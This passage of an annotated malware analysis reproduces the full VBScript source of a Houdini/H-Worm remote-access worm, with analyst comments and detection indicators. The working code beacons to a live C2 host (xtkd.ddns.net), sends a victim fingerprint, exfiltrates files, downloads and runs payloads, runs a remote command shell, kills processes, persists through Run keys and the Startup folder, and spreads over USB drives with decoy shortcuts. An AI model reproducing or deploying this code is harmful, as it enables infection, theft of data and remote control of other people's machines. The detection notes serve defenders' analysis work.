' download (C2 command "send"): fetches a file from the C2 itself by POSTing to
' http://host:port/is-sending<|>fileurl, saves it under filedir (default installdir) using
' the part of fileurl after the last backslash as the file name, and executes it.
' The URL-encoded form of this request (…/is-sending%3C%7C%3E…) is listed in the IOCs above.
sub download (fileurl,filedir)

if filedir = "" then
filedir = installdir
end if

strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
set objhttpdownload = createobject("msxml2.xmlhttp")
objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
objhttpdownload.send ""

set objfsodownload = createobject ("scripting.filesystemobject")
if objfsodownload.fileexists (strsaveto) then
objfsodownload.deletefile (strsaveto)
end if
if objhttpdownload.status = 200 then
dim objstreamdownload
' adodb.stream type 1 = binary.
set objstreamdownload = createobject("adodb.stream")
with objstreamdownload
.type = 1
.open
.write objhttpdownload.responsebody
.savetofile strsaveto
.close
end with
set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub
  482.  
  483.  
' upload (C2 command "recv"): exfiltration. Reads the local file at fileurl as a binary
' stream and POSTs its raw bytes to http://host:port/is-recving<|>fileurl.
' Network signature: POST to a path containing "is-recving" with a binary body.
' (The local httpobj shadows the global one; the "set objstreamdownload = nothing" line
' references a name not used in this function and has no effect.)
function upload (fileurl)

dim httpobj,objstreamuploade,buffer
set objstreamuploade = createobject("adodb.stream")
with objstreamuploade
' type 1 = binary.
.type = 1
.open
.loadfromfile fileurl
buffer = .read
.close
end with
set objstreamdownload = nothing
set httpobj = createobject("msxml2.xmlhttp")
httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
httpobj.send buffer
end function
  500.  
  501.  
' enumdriver (C2 command "enum-driver"): lists every ready drive as "path|drivetype<|>";
' the result is posted to /is-enum-driver by the main loop.
function enumdriver ()

for each drive in filesystemobj.drives
if drive.isready = true then
enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
end if
next
end Function
  510.  
' enumfaf (C2 command "enum-faf", "files and folders"): directory listing of enumdir.
' Format: enumdir<|> then one record per entry, name|size|kind|attributes<|>, where kind
' is "d" for sub-folders (size left empty) and "f" for files. Posted to /is-enum-faf.
function enumfaf (enumdir)

enumfaf = enumdir & spliter
for each folder in filesystemobj.getfolder (enumdir).subfolders
enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
next

for each file in filesystemobj.getfolder (enumdir).files
enumfaf = enumfaf & file.name & "|" & file.size & "|" & "f" & "|" & file.attributes & spliter

next
end function
  523.  
  524.  
' enumprocess (C2 command "enum-process"): WMI Win32_Process listing, one record per process
' as name|processid|executablepath<|>. Posted to /is-enum-process; feeds the "exit-process"
' command (taskkill by PID). A wscript.exe process issuing Win32_Process queries is itself
' a useful telemetry hook.
function enumprocess ()

on error resume next

set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
' flags 48 = ReturnImmediately | ForwardOnly.
set colitems = objwmiservice.execquery("select * from win32_process",,48)

dim objitem
for each objitem in colitems
enumprocess = enumprocess & objitem.name & "|"
enumprocess = enumprocess & objitem.processid & "|"
enumprocess = enumprocess & objitem.executablepath & spliter
next
end function
  539.  
' exitprocess (C2 command "exit-process"): force-kills the process tree of the given PID
' with taskkill /F /T, window style 7 (minimized), waiting for completion. Typically used
' against security tooling enumerated via enumprocess — a child taskkill.exe spawned by
' wscript.exe is a high-signal detection event.
sub exitprocess (pid)
on error resume next

shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub
  545.  
' deletefaf (C2 command "delete"): deletes url as a file and, failing that, as a folder.
' Both calls are attempted; the one that does not apply fails silently under on error resume next.
sub deletefaf (url)
on error resume next

filesystemobj.deletefile url
filesystemobj.deletefolder url

end sub
  553.  
' cmdshell (C2 command "cmd-shell"): runs cmd through %comspec% /c and returns its output,
' which the main loop posts to /is-cmd-shell. Only one stream is captured: stdout if it has
' data, otherwise stderr, otherwise "". Detection hook: cmd.exe spawned as a child of
' wscript.exe with a "/c" command line.
function cmdshell (cmd)

dim httpobj,oexec,readallfromany

set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
readallfromany = oexec.stderr.readall
else
readallfromany = ""
end if

cmdshell = readallfromany
end function
  569. --------------------------------------------------------------
  570. [2nd .VBS dropper]
  571. --------------------------------------------------------------
  572.  
  573.  
' Analyst notes: 2nd-stage .VBS. Apart from the author banner below and a different C2
' (xtkd.ddns.net:3233 instead of freshguys.ddnsking.com:5674) this is the same Houdini /
' H-Worm script as the 1st dropper, with the builder's original section comments left in.
' The command handling and the helper subs are identical; see the annotations on the first copy.
'<[ recoder : houdini (c) skype : houdini-fx ]>

'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=

' Beacons go to http://host:port/<command> (function post).
host = "xtkd.ddns.net"
port = 3233
installdir = "%temp%"
' LNK-hijack branches in sub install are disabled in this build too.
lnkfile = false
lnkfolder = false

'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=

dim shellobj
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")


'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=

installname = wscript.scriptname
startup = shellobj.specialfolders ("startup") & "\"
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
' "<|>" field separator; appears as %3C%7C%3E in URLs.
spliter = "<" & "|" & ">"
' Beacon interval in ms; adjustable through the "sleep" command.
sleep = 5000
dim response
dim cmd
dim param
info = ""
usbspreading = ""
startdate = ""
dim oneonce

'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
' All errors suppressed from here on.
on error resume next


' instance: HKLM origin marker, persistence, relaunch from %temp%, single-instance lock.
instance
' Main C2 loop: re-persist, poll /is-ready, dispatch on the first "<|>"-separated field.
while true

install

response = ""
response = post ("is-ready","")
cmd = split (response,spliter)
select case cmd (0)
' "excecute" (sic): C2-supplied VBScript run in-process.
case "excecute"
param = cmd (1)
execute param
' "update": rewrite the installed script with C2 content and relaunch.
case "update"
param = cmd (1)
oneonce.close
set oneonce = filesystemobj.opentextfile (installdir & installname ,2, false)
oneonce.write param
oneonce.close
shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
wscript.quit
case "uninstall"
uninstall
' Download-and-run primitives (from the C2, or from any URL).
case "send"
download cmd (1),cmd (2)
case "site-send"
sitedownloader cmd (1),cmd (2)
' File exfiltration.
case "recv"
param = cmd (1)
upload (param)
case "enum-driver"
post "is-enum-driver",enumdriver
case "enum-faf"
param = cmd (1)
post "is-enum-faf",enumfaf (param)
case "enum-process"
post "is-enum-process",enumprocess
' Remote command execution through %comspec%.
case "cmd-shell"
param = cmd (1)
post "is-cmd-shell",cmdshell (param)
case "delete"
param = cmd (1)
deletefaf (param)
case "exit-process"
param = cmd (1)
exitprocess (param)
' Interval is a C2-supplied expression evaluated with eval.
case "sleep"
param = cmd (1)
sleep = eval (param)
end select

wscript.sleep sleep

wend
  667.  
  668.  
' --- Analyst annotation: removable-drive spreading + persistence refresh ---
' Invoked from the main beacon loop. First re-applies persistence via
' upstart, then for every ready drive whose FSO DriveType is 1 (the FSO
' constant for "Removable") it:
'   * copies the running script to <drive>\<installname> and marks it
'     attributes 2+4 (Hidden + System)
'   * marks every existing non-.lnk file Hidden+System and drops a
'     <basename>.lnk decoy beside it whose target is cmd.exe and whose
'     arguments launch the worm copy first, then the original file
'   * marks every subfolder Hidden+System and drops a <folder>.lnk decoy
'     that launches the worm copy, then "explorer <folder>"
' The decoy icon is read from HKLM\software\classes\<ext>\defaulticon
' (or the file/folder itself) so the shortcut looks like the hidden item.
' Globals referenced but defined outside this excerpt: lnkfile and
' lnkfolder (feature flags that gate the two loops), installname,
' filesystemobj, shellobj. Every error is swallowed by
' "on error resume next", so read-only or full media is skipped silently.
' Detection: .lnk files at a removable-drive root with TargetPath cmd.exe
' and Arguments of the form "/c start <x>&start <y>&exit"; Hidden+System
' attributes newly set on all root-level files and folders.
sub install
on error resume next
dim lnkobj
dim filename
dim foldername
dim fileicon
dim foldericon

' Persistence (Run keys + Startup copy) is refreshed on every pass.
upstart
for each drive in filesystemobj.drives

if drive.isready = true then
if drive.freespace > 0 then
' DriveType 1 = removable media; fixed/network/CD drives are not touched.
if drive.drivetype = 1 then
filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
if filesystemobj.fileexists (drive.path & "\" & installname) then
' 2 = Hidden, 4 = System (FSO FileAttribute constants).
filesystemobj.getfile(drive.path & "\" & installname).attributes = 2+4
end if
for each file in filesystemobj.getfolder( drive.path & "\" ).Files
' lnkfile is a global flag set earlier in the script (not visible here).
if not lnkfile then exit for
if instr (file.name,".") then
' Existing shortcuts are left alone so decoys are not re-decoyed.
if lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
file.attributes = 2+4
if ucase (file.name) <> ucase (installname) then
filename = split(file.name,".")
set lnkobj = shellobj.createshortcut (drive.path & "\" & filename (0) & ".lnk")
' WindowStyle 7 = minimized, so the cmd window is not noticed.
lnkobj.windowstyle = 7
lnkobj.targetpath = "cmd.exe"
lnkobj.workingdirectory = ""
' Spaces in names are rewritten as a quoted space so cmd keeps each
' name as a single token; the worm copy runs before the real file.
lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
' Look up the registered DefaultIcon for the file's extension.
fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
if instr (fileicon,",") = 0 then
lnkobj.iconlocation = file.path
else
lnkobj.iconlocation = fileicon
end if
lnkobj.save()
end if
end if
end if
next
for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
' lnkfolder is a global flag set earlier in the script (not visible here).
if not lnkfolder then exit for
folder.attributes = 2+4
foldername = folder.name
set lnkobj = shellobj.createshortcut (drive.path & "\" & foldername & ".lnk")
lnkobj.windowstyle = 7
lnkobj.targetpath = "cmd.exe"
lnkobj.workingdirectory = ""
' Folder decoy: run the worm copy, then open the hidden folder in Explorer.
lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
if instr (foldericon,",") = 0 then
lnkobj.iconlocation = folder.path
else
lnkobj.iconlocation = foldericon
end if
lnkobj.save()
next
end If
end If
end if
next
err.clear
end sub
  733.  
' --- Analyst annotation: operator-triggered removal ("uninstall" command) ---
' Deletes the HKCU and HKLM Run values named after installname (minus
' extension), removes the Startup-folder copy and the currently running
' script file, then walks every ready removable drive (DriveType 1):
'   * clears the attributes on each file and deletes the matching
'     <basename>.lnk decoy, or deletes the worm copy itself when the
'     file is installname
'   * deletes outright any root-level file whose name contains no "."
'     (collateral damage to extensionless victim files)
'   * clears the attributes on each subfolder (folder .lnk decoys are
'     NOT removed here)
' Finally terminates the script with wscript.quit.
' Forensic notes: the HKLM\software\<installname-base>\ marker written by
' instance() is not removed, and the installdir copy is only removed when
' it is the script currently executing (wscript.scriptfullname).
sub uninstall
on error resume next
dim filename
dim foldername

shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true

for each drive in filesystemobj.drives
if drive.isready = true then
if drive.freespace > 0 then
if drive.drivetype = 1 then
for each file in filesystemobj.getfolder ( drive.path & "\").files
on error resume next
if instr (file.name,".") then
if lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
' Un-hide the original (attributes 0 = Normal).
file.attributes = 0
if ucase (file.name) <> ucase (installname) then
filename = split(file.name,".")
' Remove the decoy shortcut created by install().
filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
else
' Remove the worm copy planted at the drive root.
filesystemobj.deletefile (drive.path & "\" & file.name)
end If
else
' No "." in the name: the file is deleted, not restored.
filesystemobj.deletefile (file.path)
end if
end if
next
for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
folder.attributes = 0
next
end if
end if
end if
next
wscript.quit
end sub
  773.  
' --- Analyst annotation: C2 beacon primitive ---
' Synchronous HTTP POST to http://<host>:<port>/<cmd> with the optional
' body param; returns the response text, which the main loop splits on
' the global spliter to obtain the next command. host, port and httpobj
' are globals defined earlier in the script (not visible here).
' The header name is written as "user-agent:" (literal trailing colon)
' and its value is the information() string — so every beacon carries
' the hwid, computer name, user name, OS caption, AV list and spreading
' flag in the User-Agent. That is the primary network signature.
function post (cmd ,param)

' Pre-seeded with param; overwritten by the response when the call succeeds.
post = param
httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function
  782.  
' --- Analyst annotation: victim fingerprint sent in every beacon ---
' Builds (once, cached in the global inf) the string
'   <hwid><|><computername><|><username><|><OS caption><|>plus<|><AV list><|><usbspreading>
' where <|> stands for the global spliter. The OS caption comes from a
' WMI Win32_OperatingSystem query; the AV list from security(); the
' usbspreading value is the registry marker set by instance(). The literal
' "plus" is a fixed token in this variant. spliter, inf and usbspreading
' are globals defined outside this excerpt.
function information
on error resume next
if inf = "" then
inf = hwid & spliter
inf = inf & shellobj.expandenvironmentstrings("%computername%") & spliter
inf = inf & shellobj.expandenvironmentstrings("%username%") & spliter

set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set os = root.execquery ("select * from win32_operatingsystem")
' Only the first Win32_OperatingSystem instance is used.
for each osinfo in os
inf = inf & osinfo.caption & spliter
exit for
next
inf = inf & "plus" & spliter
inf = inf & security & spliter
inf = inf & usbspreading
information = inf
else
' Already computed: return the cached fingerprint.
information = inf
end if
end function
  804.  
  805.  
' --- Analyst annotation: persistence ---
' Writes a REG_SZ Run value named <installname without extension> under
' both HKCU and HKLM ...\CurrentVersion\Run with the data
'   wscript.exe //B "<installdir><installname>"
' and copies the running script to <installdir> and to the user's Startup
' folder. The HKLM write needs elevation; when it fails the error is
' swallowed by "on error resume Next" and only the HKCU value remains.
' installdir, installname and startup are globals defined outside this
' excerpt. Detection: Run values launching wscript.exe //B against a
' script in a profile/temp directory, plus a matching file in Startup.
sub upstart ()
on error resume Next

shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true

end sub
  815.  
  816.  
' --- Analyst annotation: victim identifier ---
' Returns the VolumeSerialNumber of the first Win32_LogicalDisk instance
' that has a non-empty serial. This is the per-host ID the C2 sees at the
' start of the User-Agent fingerprint; it stays stable across reboots and
' re-infections as long as the disk layout does not change.
function hwid
on error resume next

set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery ("select * from win32_logicaldisk")
for each disk in disks
if disk.volumeserialnumber <> "" then
hwid = disk.volumeserialnumber
exit for
end if
next
end function
  829.  
  830.  
' --- Analyst annotation: installed-AV reconnaissance ---
' Picks the WMI namespace root\securitycenter2 (Vista+) or
' root\securitycenter (older) based on the OS version, then returns the
' displayName of every AntiVirusProduct instance joined with " .", or
' the literal "nan-av" when none is found.
' Code-quality notes for analysts (do not "fix" — this is how the sample
' behaves in the wild):
'   * the for loop indexes versionstr(i) although the loop variable is x;
'     i is never assigned, so the major version digit is appended on each
'     iteration instead of the minor/build parts
'   * colitems.version is read from the query collection rather than an
'     instance; with "on error resume next" that line is most likely a
'     swallowed error, leaving the value assigned inside the loop
'   * the resulting string is passed to eval() to turn it into a number
' The ">" 6 comparison still yields the intended namespace on the
' versions this logic targets, which is why the bugs went unnoticed.
' Detection: WMI queries against root\SecurityCenter2 AntiVirusProduct
' from a wscript.exe process.
function security
on error resume next

security = ""

set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
for each objitem in colitems
versionstr = split (objitem.version,".")
next
versionstr = split (colitems.version,".")
osversion = versionstr (0) & "."
for x = 1 to ubound (versionstr)
' NOTE: indexes with i (unassigned) rather than the loop variable x.
osversion = osversion & versionstr (i)
next
osversion = eval (osversion)
if osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"

set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)

for each objantivirus in colantivirus
security = security & objantivirus.displayname & " ."
next
if security = "" then security = "nan-av"
end function
  857.  
  858.  
' --- Analyst annotation: first-run marker, relocation and single-instance lock ---
' 1. Reads HKLM\software\<installname-base>\ into the global usbspreading.
'    When empty, records whether this copy was launched from a drive root
'    (path of the form X:\<installname>, i.e. from removable media) as
'    "true - <date>" or "false - <date>" and writes that marker back.
'    The marker is the only place infection date/origin is stored and it
'    survives uninstall().
' 2. Calls upstart() to install persistence.
' 3. If the running script's short path differs from the install copy's
'    short path, relaunches the install copy with wscript.exe //B and exits,
'    so the resident instance always runs from installdir.
' 4. Opens the install copy for append (mode 8) into the global oneonce and
'    quits when that fails. Because the handle is held open for the life of
'    the process, a second instance cannot open the file and exits here —
'    this appears to be the sample's single-instance mechanism. The handle
'    is also what the "update" command writes through.
' The HKLM write requires elevation; on failure the error is swallowed.
function instance
on error resume next

usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
if usbspreading = "" then
' mid(...,2) strips the drive letter; ":\<installname>" means drive root.
if lcase ( mid(wscript.scriptfullname,2)) = ":\" & lcase(installname) then
usbspreading = "true - " & date
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"
else
usbspreading = "false - " & date
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"

end if
end If



upstart
set scriptfullnameshort = filesystemobj.getfile (wscript.scriptfullname)
set installfullnameshort = filesystemobj.getfile (installdir & installname)
' Short (8.3) paths are compared so case and long/short name differences
' do not cause an endless relaunch loop.
if lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
wscript.quit
end If
err.clear
' Mode 8 = ForAppending; the open handle doubles as an instance lock.
set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
if err.number > 0 then wscript.quit
end function
  887.  
  888.  
' --- Analyst annotation: "site-send" command — download from arbitrary URL and execute ---
' Performs a synchronous HTTP GET of fileurl with a fresh msxml2.xmlhttp,
' deletes any existing <installdir><filename>, and on HTTP 200 writes the
' raw response body to that path through an ADODB.Stream in binary mode
' (type 1). If the file now exists it is executed via shellobj.run using
' its short path. filename is taken verbatim from the C2 command, so the
' operator fully controls the drop location under installdir. This sub has
' no "on error resume next" of its own; it relies on the caller's.
' Detection: wscript.exe writing a new file into installdir immediately
' after an outbound GET, followed by wscript.exe spawning that file.
sub sitedownloader (fileurl,filename)

strlink = fileurl
strsaveto = installdir & filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
objhttpdownload.open "get", strlink, false
objhttpdownload.send

set objfsodownload = createobject ("scripting.filesystemobject")
' Overwrite semantics: remove the previous drop before saving.
if objfsodownload.fileexists (strsaveto) then
objfsodownload.deletefile (strsaveto)
end if

if objhttpdownload.status = 200 then
dim objstreamdownload
set objstreamdownload = createobject("adodb.stream")
with objstreamdownload
' adTypeBinary: payload is written byte-for-byte.
.type = 1
.open
.write objhttpdownload.responsebody
.savetofile strsaveto
.close
end with
set objstreamdownload = nothing
end if
' Execute the dropped payload.
if objfsodownload.fileexists(strsaveto) then
shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub
  918.  
' --- Analyst annotation: "send" command — pull a file from the C2 and execute ---
' fileurl is a path on the operator's side (the basename is taken after the
' last backslash); filedir is the local target directory, defaulting to
' installdir when empty. The request is a POST to
'   http://<host>:<port>/is-sending<spliter><fileurl>
' with an empty body; on HTTP 200 the response body is saved binary
' (ADODB.Stream type 1) to <filedir><basename>, replacing any existing
' file, and then executed via shellobj.run on its short path.
' Unlike sitedownloader, this always talks to the configured C2, so the
' "is-sending" URI segment is a usable network indicator.
sub download (fileurl,filedir)

if filedir = "" then
filedir = installdir
end if

' Basename after the last "\" (C2-side Windows path convention).
strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
set objhttpdownload = createobject("msxml2.xmlhttp")
objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
objhttpdownload.send ""

set objfsodownload = createobject ("scripting.filesystemobject")
if objfsodownload.fileexists (strsaveto) then
objfsodownload.deletefile (strsaveto)
end if
if objhttpdownload.status = 200 then
dim objstreamdownload
set objstreamdownload = createobject("adodb.stream")
with objstreamdownload
.type = 1
.open
.write objhttpdownload.responsebody
.savetofile strsaveto
.close
end with
set objstreamdownload = nothing
end if
' Execute whatever was written.
if objfsodownload.fileexists(strsaveto) then
shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub
  950.  
  951.  
' --- Analyst annotation: "recv" command — exfiltrate a local file ---
' Reads the file at fileurl (a local path, despite the name) fully into
' memory through a binary ADODB.Stream and POSTs the bytes to
'   http://<host>:<port>/is-recving<spliter><fileurl>
' using a new msxml2.xmlhttp object (the local "dim httpobj" shadows the
' global of the same name for this call only). No size limit is applied.
' Note: the cleanup line releases objstreamdownload, a name not used in
' this function; objstreamuploade is never explicitly released.
' Detection: outbound POST whose URI contains "is-recving" followed by a
' local file path.
function upload (fileurl)

dim httpobj,objstreamuploade,buffer
set objstreamuploade = createobject("adodb.stream")
with objstreamuploade
.type = 1
.open
.loadfromfile fileurl
buffer = .read
.close
end with
set objstreamdownload = nothing
set httpobj = createobject("msxml2.xmlhttp")
httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
httpobj.send buffer
end function
  968.  
  969.  
' --- Analyst annotation: "enum-driver" command — list drives ---
' Returns one "<path>|<drivetype>" entry per ready drive, entries joined
' with the global spliter. drivetype is the FSO DriveType numeric value
' (the same field install() tests against 1 for removable media).
function enumdriver ()

for each drive in filesystemobj.drives
if drive.isready = true then
enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
end if
next
end Function
  978.  
' --- Analyst annotation: "enum-faf" command — list a directory ---
' Returns the queried directory followed by one record per entry, all
' joined with the global spliter. Records are pipe-delimited:
'   subfolders:  <name>||d|<attributes>
'   files:       <name>|<size>|f|<attributes>
' No error handling of its own; an inaccessible enumdir surfaces through
' the caller's "on error resume next".
function enumfaf (enumdir)

enumfaf = enumdir & spliter
for each folder in filesystemobj.getfolder (enumdir).subfolders
enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
next

for each file in filesystemobj.getfolder (enumdir).files
enumfaf = enumfaf & file.name & "|" & file.size & "|" & "f" & "|" & file.attributes & spliter

next
end function
  991.  
  992.  
' --- Analyst annotation: "enum-process" command — process listing ---
' Queries WMI Win32_Process (flags 48 = forward-only, return-immediately)
' and returns "<name>|<processid>|<executablepath>" per process, joined
' with the global spliter. Feeds the operator the PIDs later passed to the
' "exit-process" command.
function enumprocess ()

on error resume next

set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_process",,48)

dim objitem
for each objitem in colitems
enumprocess = enumprocess & objitem.name & "|"
enumprocess = enumprocess & objitem.processid & "|"
enumprocess = enumprocess & objitem.executablepath & spliter
next
end function
  1007.  
' --- Analyst annotation: "exit-process" command — kill a process tree ---
' Runs "taskkill /F /T /PID <pid>" minimized (window style 7) and waits for
' it to finish (third argument true). pid comes straight from the C2
' command. Detection: wscript.exe spawning taskkill.exe with /F /T.
sub exitprocess (pid)
on error resume next

shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub
  1013.  
' --- Analyst annotation: "delete" command — remove a file or folder ---
' Attempts deletefile and then deletefolder on the same path; whichever
' does not apply raises an error that "on error resume next" swallows,
' so the operator can delete either kind with one command. Folder
' deletion is recursive by the FSO default.
sub deletefaf (url)
on error resume next

filesystemobj.deletefile url
filesystemobj.deletefolder url

end sub
  1021.  
' --- Analyst annotation: "cmd-shell" command — remote command execution ---
' Executes the operator-supplied string via "%comspec% /c <cmd>" with
' shellobj.exec and returns the captured output. Only one stream is
' returned: stdout when it has data, otherwise stderr, otherwise "".
' The readall calls block until the child process closes the stream.
' The local "dim httpobj" shadows the global and is unused here.
' Detection: wscript.exe spawning cmd.exe /c with operator-chosen
' arguments; the result travels back in the body of the "is-cmd-shell"
' beacon.
function cmdshell (cmd)

dim httpobj,oexec,readallfromany

set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
' stderr is only reported when stdout produced nothing.
readallfromany = oexec.stderr.readall
else
readallfromany = ""
end if

cmdshell = readallfromany
end function